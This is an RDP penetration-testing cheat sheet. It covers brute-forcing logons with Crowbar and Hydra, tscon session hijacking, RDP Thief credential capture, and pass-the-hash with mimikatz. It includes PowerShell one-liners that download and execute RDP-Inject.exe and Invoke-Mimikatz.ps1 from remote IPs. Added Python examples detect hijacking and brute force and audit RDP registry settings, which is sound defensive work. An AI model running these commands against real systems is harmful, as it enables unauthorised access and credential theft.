# Pentesting RDP

### CROWBAR

* Brute-forcing Remote Desktop Protocol logons with Crowbar
  * Crowbar is a network authentication cracking tool

```
sudo apt install crowbar
```

* Build a suitable wordlist
* Attempt to brute-force RDP (one thread, since RDP does not reliably handle parallel attempts)

```
crowbar -b rdp -s $host/32 -u admin -C /usr/share/wordlists/rockyou.txt -n 1 -v
# -b protocol (brute type)
# -s target server, in CIDR notation
# -u username
# -C password wordlist file
# -n number of threads (RDP doesn't reliably handle multiple threads)
# -v verbose
```

* If Crowbar fails with an error such as `File Not Found`, convert the wordlist to UTF-8

```
iconv -f ISO-8859-1 -t UTF-8 /usr/share/wordlists/rockyou.txt > rockyou_utf8.txt
```

### RDP Session Hijacking

* Requires SYSTEM privileges; list the existing sessions first

```
query user
```

* <https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tscon>

```
# Directly, when already running as SYSTEM:
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
# Or through a service, which runs as SYSTEM (session 1 attached to our rdp-tcp#0 session):
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0"
net start sessionhijack
```
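From the defender's side, the technique above leaves two artifacts: a service whose binary path wraps `tscon`, and a `tscon.exe` process running as SYSTEM with a `/dest:` argument. The detector below is an added example, not part of the original notes or of Microsoft's tooling; its input is a list of constructed records shaped like Sysmon event 1 (process creation) and System log event 7045 (service installed) fields, and it returns one alert per matching record.

```python
"""Flag the tscon-based RDP session hijack pattern in process-creation and
service-install telemetry.

Added example for this page, not code from the original notes. The events
below are constructed samples; the field names mirror Sysmon event 1
(Image, CommandLine, User, ParentImage) and System event 7045
(ServiceName, ImagePath, AccountName).
"""
import re

# tscon / tscon.exe followed by a /dest: switch anywhere in the command.
TSCON_DEST = re.compile(r"\btscon(?:\.exe)?\b.*?/dest:", re.IGNORECASE)

SAMPLE_EVENTS = [
    # The `sc.exe create sessionhijack ...` step shows up as a 7045 whose
    # ImagePath is not a service binary at all but a cmd.exe wrapping tscon.
    {"EventID": 7045, "ServiceName": "sessionhijack",
     "ImagePath": "cmd.exe /k tscon 1 /dest:rdp-tcp#0", "AccountName": "LocalSystem"},
    # The resulting tscon.exe process: SYSTEM attaching another user's session.
    {"EventID": 1, "Image": r"C:\Windows\System32\tscon.exe",
     "CommandLine": "tscon 1 /dest:rdp-tcp#0", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Benign: an interactive user reconnecting a session under their own account.
    {"EventID": 1, "Image": r"C:\Windows\System32\tscon.exe",
     "CommandLine": "tscon 2 /dest:console", "User": "CORP\\helpdesk",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Benign: an ordinary service installation.
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "AccountName": "LocalSystem"},
]


def hijack_alerts(events):
    """Return a list of (rule, detail) tuples for records matching either
    hijack indicator: a service wrapping tscon, or tscon run as SYSTEM with
    a /dest: target. Legitimate tscon use by a normal user is not flagged."""
    alerts = []
    for e in events:
        if e["EventID"] == 7045 and TSCON_DEST.search(e.get("ImagePath", "")):
            alerts.append(("service_wraps_tscon", e["ServiceName"]))
        elif e["EventID"] == 1 and e["Image"].lower().endswith("tscon.exe"):
            runs_as_system = e["User"].upper().endswith("\\SYSTEM")
            if runs_as_system and "/dest:" in e["CommandLine"].lower():
                alerts.append(("tscon_as_system", e["CommandLine"]))
    return alerts


if __name__ == "__main__":
    for rule, detail in hijack_alerts(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Pairing the second rule with the `query user` / `quser.exe` execution that precedes it (also as SYSTEM, within a short window) reduces noise further; the version above keeps the two indicators independent so each can be tuned on its own.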

### SHARP RDP

```
SharpRDP.exe computername=appsrv01 command="powershell -c IEX" username=corp\dave password=lab
```

### RDP Thief

* `rdpthief.dll` must already be on the local machine
* Modify the C# source with the on-disk location of the hidden `RDPThief.dll`
* The C# `RDP-Inject.exe` runs in a while loop and injects the DLL into each RDP client process to capture the credentials entered into it
* Dump the captured credentials

```
type C:\Users\User\AppData\Local\Temp\3\data.bin
```

```
$wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $data = $wc.DownloadData('http://192.168.49.124/RDP-Inject.exe');$assem = [System.Reflection.Assembly]::Load($data);$entryPointMethod = $assem.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');$entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))
```

* The above command pulls `RDP-Inject.exe` (the RDP Thief injector) from a remote web server and loads it in memory via PowerShell reflection. Update the URL and the arguments in the command before use

### Screenshot the Desktop

* You can take a screenshot of the desktop if NLA is disabled, using `netexec` with the following options

```
--nla-screenshot
--screenshot
--screentime SCREENTIME
```

* Resolution as WxH (default 1024x768)

```
--res RES
```

### Enable RDP via CrackMapExec / NetExec

```
nxc smb 10.129.203.121 -u julio -p Password1 -M rdp --options 
nxc smb 10.129.203.121 -u julio -p Password1 -M rdp -o ACTION=enable
```

### Enable RDP via Registry

```
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall add rule name=3389 protocol=TCP dir=in localip=any localport=3389 action=allow
```

### Enable RDP access for user

```
net localgroup "Remote Desktop Users" joe /add
```

```
Add-LocalGroupMember -Group 'Remote Desktop Users' -Member robert.lanza 
powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member john' 
powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member alice'
```

### Remove Remote Desktop Access for user

```
Remove-LocalGroupMember -Group "Remote Desktop Users" -Member robert.lanza
```

### If PTH is Disabled

* Enable Restricted Admin mode (the value is `DisableRestrictedAdmin`, so `0` turns the mode on)

```
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```

### RDesktop

```
rdesktop 10.11.1.13 -u xxx -p xxx
rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!'
```

* Mount folders using RDesktop

```
rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!' -r disk:linux='~/tools'
```

### XFreeRDP

```
xfreerdp /v:$host /u:administrator /cert:ignore 
xfreerdp /v:10.11.1.31 /u:sa /p:poiuytrewq /cert:ignore
```

* `/cert:ignore` skips certificate validation, since RDP servers commonly present self-signed certificates

```
xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution
xfreerdp /v:10.11.1.247 /port:1234 /u:brett /p:ilovesecuritytoo
```

* Share a folder from our attacker machine into the target's RDP session (it appears as a redirected drive)

```
mkdir /tmp/filetransfer
xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /drive:~/tools
```

* If you encounter the error below, add the `/tls-seclevel:0` switch

```
[ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED
```

```
xfreerdp /v:$host /u:administrator /cert:ignore /tls-seclevel:0
```

* Other xfreerdp invocations, with options that have proven useful in the past

```
xfreerdp /v:manageengine /u:Administrator /p:studentlab /cert:ignore /tls-seclevel:0 /timeout:80000 /size:1920x1010 /scale:50
xfreerdp /u:blwasp /p:'Password123!' /v:10.129.230.38 /dynamic-resolution /drive:.,linux /bpp:8 /compression -themes -wallpaper /clipboard /audio-mode:0 /auto-reconnect -glyph-cache
```

FreeRDP 3 syntax is similar:

```bash
xfreerdp3 /v:TARGET /u:USER /d:DOMAIN.LOCAL /p:'PASSWORD' /cert:ignore
xfreerdp3 /v:TARGET /u:'.\LOCALUSER' /p:'PASSWORD' /cert:ignore
```

### Pass The Hash RDP

```
xfreerdp /u:domain\username /pth: /v:$host
```

* If PTH is disabled, enable Restricted Admin mode (the value is `DisableRestrictedAdmin`, so `0` turns the mode on)

```
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```
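The `reg add` commands in the sections above (enabling RDP, enabling Restricted Admin) and the NLA condition in the screenshot section each correspond to one registry value, so an audit of those values tells you which of these techniques a host is exposed to. The script below is an added example, not from the original notes: it parses the text that `reg query` prints and grades each state. The `REG_QUERY_OUTPUT` sample is constructed; on a real host the same layout comes from, for example, `reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections`.

```python
"""Audit RDP exposure from `reg query` output.

Added example for this page, not code from the original notes. The sample
output below is constructed in the layout `reg query` prints (key path on
its own line, then indented `name  type  data` rows).
"""
import re

# Indented value row: name, REG_* type, data.
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.+?)\s*$")

REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    UserAuthentication    REG_DWORD    0x0
    SecurityLayer    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    DisableRestrictedAdmin    REG_DWORD    0x0
"""


def parse_reg_query(text):
    """Map lower-cased value name -> (key path, int data) for REG_DWORD rows."""
    values, key = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()          # a new key path; rows below belong to it
            continue
        m = VALUE_LINE.match(line)
        if m and m.group(2) == "REG_DWORD":
            values[m.group(1).lower()] = (key, int(m.group(3), 16))
    return values


def assess_rdp_settings(values):
    """Return (severity, code, message) findings for the parsed values."""
    def data(name):
        entry = values.get(name.lower())
        return None if entry is None else entry[1]

    findings = []
    if data("fDenyTSConnections") == 0:
        findings.append(("info", "rdp_enabled",
                         "fDenyTSConnections=0: inbound RDP is enabled"))
    if data("UserAuthentication") == 0:
        findings.append(("high", "nla_disabled",
                         "UserAuthentication=0: NLA is off, so the logon screen is "
                         "reachable before authentication (the --nla-screenshot case)"))
    if data("SecurityLayer") == 0:
        findings.append(("high", "weak_security_layer",
                         "SecurityLayer=0: legacy RDP security instead of TLS"))
    restricted_admin = data("DisableRestrictedAdmin")
    if restricted_admin is None:
        # Absent value: Restricted Admin mode is off by default.
        findings.append(("info", "restricted_admin_default",
                         "DisableRestrictedAdmin absent: Restricted Admin mode off (default)"))
    elif restricted_admin == 0:
        findings.append(("medium", "restricted_admin_enabled",
                         "DisableRestrictedAdmin=0: Restricted Admin on, RDP logon with an "
                         "NTLM hash (/pth, mstsc /restrictedadmin) is accepted"))
    return findings


if __name__ == "__main__":
    for severity, code, message in assess_rdp_settings(parse_reg_query(REG_QUERY_OUTPUT)):
        print(f"{severity:6} {code:26} {message}")
```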

### Validate RDP Access with NetExec

When testing known users and passwords, use `--no-bruteforce` to try each username/password pair in order instead of spraying every password against every user:

```bash
netexec rdp targets.txt -d DOMAIN.LOCAL -u users.txt -p passwords.txt --no-bruteforce
netexec rdp TARGET -u USER -H NTLM_HASH --local-auth
```

RDP and WinRM authorization are separate. Credentials that work for RDP may still fail WinRM if the user is not allowed to use PowerShell remoting.

### PTH RDP From a Windows machine

```
sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:"mstsc.exe /restrictedadmin"

$wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $wc.DownloadString('http://192.168.49.120/Invoke-Mimikatz.ps1') | IEX
Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:mstsc.exe /restrictedadmin"'
```

### Nmap

```
nmap -sV -sC 10.129.201.248 -p3389 --script rdp*
```

### RDP Security Check

```
sudo cpan                  # opens the CPAN shell
install Encoding::BER      # run inside the CPAN shell, then exit
git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
./rdp-sec-check.pl $host
```
```
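Both `rdp-sec-check` and nmap's `rdp-enum-encryption` work by sending X.224 Connection Requests that offer different security protocols and reading what the server selects or refuses. The code below is an added example, not part of either tool or of the original notes: it builds the request and decodes the two possible answers (a negotiation response, or a negotiation failure such as `HYBRID_REQUIRED_BY_SERVER`, which is what a correctly hardened server returns when offered only standard RDP security). Byte layouts follow MS-RDPBCGR; the server replies used here are constructed byte strings, so nothing touches the network.

```python
"""Build an RDP X.224 Connection Request and decode the Connection Confirm.

Added example for this page (not from rdp-sec-check, nmap or the original
notes). Layouts: TPKT header, X.224 CR/CC, RDP_NEG_REQ / RDP_NEG_RSP /
RDP_NEG_FAILURE as specified in MS-RDPBCGR. All server replies are
constructed samples.
"""
import struct

PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID = 0x0, 0x1, 0x2
PROTOCOLS = {0x0: "RDP (standard security)", 0x1: "TLS", 0x2: "CredSSP (NLA)",
             0x4: "RDSTLS", 0x8: "CredSSP-EX"}
FAILURES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
            3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
            5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}
RSP_FLAGS = {0x01: "EXTENDED_CLIENT_DATA_SUPPORTED", 0x02: "DYNVC_GFX_PROTOCOL_SUPPORTED",
             0x08: "RESTRICTED_ADMIN_MODE_SUPPORTED",
             0x10: "REDIRECTED_AUTHENTICATION_MODE_SUPPORTED"}


def build_connection_request(requested_protocols):
    """TPKT + X.224 Connection Request carrying an RDP_NEG_REQ."""
    neg = struct.pack("<BBHI", 0x01, 0, 8, requested_protocols)   # type, flags, length, protocols
    x224 = bytes([0xE0]) + struct.pack(">HHB", 0, 0, 0) + neg       # CR code, dst-ref, src-ref, class
    x224 = bytes([len(x224)]) + x224                                 # length indicator (LI)
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224           # TPKT: version 3, reserved, length


def parse_connection_confirm(pdu):
    """Decode a Connection Confirm into the server's negotiation outcome."""
    version, _, tpkt_len = struct.unpack(">BBH", pdu[:4])
    if version != 3 or tpkt_len != len(pdu):
        raise ValueError("bad TPKT header")
    li, code = pdu[4], pdu[5]
    if (code & 0xF0) != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    body = pdu[11:5 + li]                       # after LI, CC code, dst-ref, src-ref, class
    if not body:
        # Pre-negotiation servers answer with a bare CC: standard RDP security only.
        return {"result": "no_negotiation", "selected": PROTOCOLS[PROTOCOL_RDP]}
    neg_type, flags, _, value = struct.unpack("<BBHI", body[:8])
    if neg_type == 0x02:                         # RDP_NEG_RSP
        return {"result": "ok", "selected": PROTOCOLS.get(value, hex(value)),
                "flags": [n for bit, n in RSP_FLAGS.items() if flags & bit]}
    if neg_type == 0x03:                         # RDP_NEG_FAILURE
        return {"result": "failure", "reason": FAILURES.get(value, hex(value))}
    raise ValueError(f"unexpected negotiation type {neg_type:#x}")


def verdict_for_rdp_only_request(parsed):
    """Interpret the reply to a request that offered only PROTOCOL_RDP."""
    if parsed["result"] == "failure" and parsed["reason"] in (
            "SSL_REQUIRED_BY_SERVER", "HYBRID_REQUIRED_BY_SERVER",
            "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"):
        return "hardened: server refuses standard RDP security (" + parsed["reason"] + ")"
    if parsed["result"] == "no_negotiation" or parsed.get("selected") == PROTOCOLS[PROTOCOL_RDP]:
        return "weak: standard RDP security (no TLS, no NLA) accepted"
    return "negotiated " + parsed["selected"]


if __name__ == "__main__":
    print(build_connection_request(PROTOCOL_SSL | PROTOCOL_HYBRID).hex(" "))
    # Constructed replies: NLA selected with Restricted Admin advertised,
    # an NLA-required refusal, and a legacy bare Connection Confirm.
    for reply in ("03 00 00 13 0e d0 00 00 12 34 00 02 09 08 00 02 00 00 00",
                  "03 00 00 13 0e d0 00 00 12 34 00 03 00 08 00 05 00 00 00",
                  "03 00 00 0b 06 d0 00 00 12 34 00"):
        parsed = parse_connection_confirm(bytes.fromhex(reply))
        print(parsed, "->", verdict_for_rdp_only_request(parsed))
```

The `RESTRICTED_ADMIN_MODE_SUPPORTED` flag in the response is the on-the-wire counterpart of the `DisableRestrictedAdmin` registry value from the Pass The Hash section, so a negotiation capture also shows whether hash-based RDP logon is being advertised.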

***

## Nmap Enumeration

* Additional flags for RDP enumeration

```
nmap -sV -sC 10.129.201.248 -p3389 --packet-trace --disable-arp-ping -n
```

* NSE scripts: `rdp-enum-encryption` (supported security protocols and encryption levels) and `rdp-ntlm-info` (OS version, domain name and NTLM information from the RDP service)

***

## Hydra RDP Brute Force

```bash
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
```
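From the target's point of view, the Crowbar run earlier on this page, the Hydra command above and a NetExec pair-wise run all look alike: a burst of failed RDP logons (Security event 4625) from one source address. The detector below is an added example, not part of the original notes or of any of those tools; it separates a single-account brute force from a password spray by counting distinct target accounts inside a sliding time window. The event records are constructed samples shaped like the 4625 fields that matter (`LogonType`, `TargetUserName`, `IpAddress`, `TimeCreated`); in practice they come from `Get-WinEvent` or a SIEM.

```python
"""Detect RDP brute force and password spraying from Security event 4625.

Added example for this page, not code from the original notes. The events
are constructed samples. LogonType 10 is RemoteInteractive (RDP); when NLA
is enabled the failed pre-authentication is logged as LogonType 3 instead,
so both are considered.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RDP_LOGON_TYPES = {3, 10}


def _ev(ts, user, ip, logon_type=10):
    return {"EventID": 4625, "TimeCreated": datetime.fromisoformat(ts),
            "TargetUserName": user, "IpAddress": ip, "LogonType": logon_type}


# Constructed sample: one source hammering 'admin' (8 failures in 21 s),
# one source trying six accounts once each (a spray), one lone failure.
SAMPLE_EVENTS = (
    [_ev(f"2024-05-01T10:00:{s:02d}", "admin", "10.0.0.5") for s in range(0, 24, 3)]
    + [_ev(f"2024-05-01T10:05:{s:02d}", user, "10.0.0.9", logon_type=3)
       for s, user in zip(range(0, 60, 10),
                          ["alice", "bob", "carol", "dave", "erin", "frank"])]
    + [_ev("2024-05-01T10:07:00", "julio", "10.0.0.20")]
)


def detect_rdp_attacks(events, window=timedelta(minutes=5),
                       fail_threshold=5, spray_user_threshold=5):
    """Return {source_ip: finding} for sources with at least fail_threshold
    RDP logon failures inside any window-long span. The finding is 'spray'
    when that span touches spray_user_threshold or more distinct accounts,
    otherwise 'bruteforce'. The largest qualifying span per source wins."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625 and e["LogonType"] in RDP_LOGON_TYPES:
            by_ip[e["IpAddress"]].append(e)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until the span fits in `window`.
            while evs[end]["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1
            span = evs[start:end + 1]
            if len(span) < fail_threshold:
                continue
            if len(span) > findings.get(ip, {}).get("failures", 0):
                users = {e["TargetUserName"] for e in span}
                findings[ip] = {
                    "pattern": "spray" if len(users) >= spray_user_threshold else "bruteforce",
                    "failures": len(span),
                    "distinct_users": len(users),
                    "first_seen": span[0]["TimeCreated"].isoformat(),
                }
    return findings


if __name__ == "__main__":
    for ip, finding in detect_rdp_attacks(SAMPLE_EVENTS).items():
        print(ip, finding)
```

The thresholds are deliberately low for the sample; on a real estate tune `fail_threshold` against the normal rate of mistyped passwords and keep `spray_user_threshold` small, since a spray with `--no-bruteforce` style pairing produces exactly one failure per account and hides under a per-account lockout policy.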

***

## BlueKeep (CVE-2019-0708)

* Use-After-Free vulnerability in RDP (TCP 3389)
* No authentication required — pre-authentication RCE
* Achieves code execution as LocalSystem
* Affects Windows 7, Windows Server 2008/2008 R2, Windows XP, Windows Vista
* Approximately 950,000 hosts were initially vulnerable when disclosed

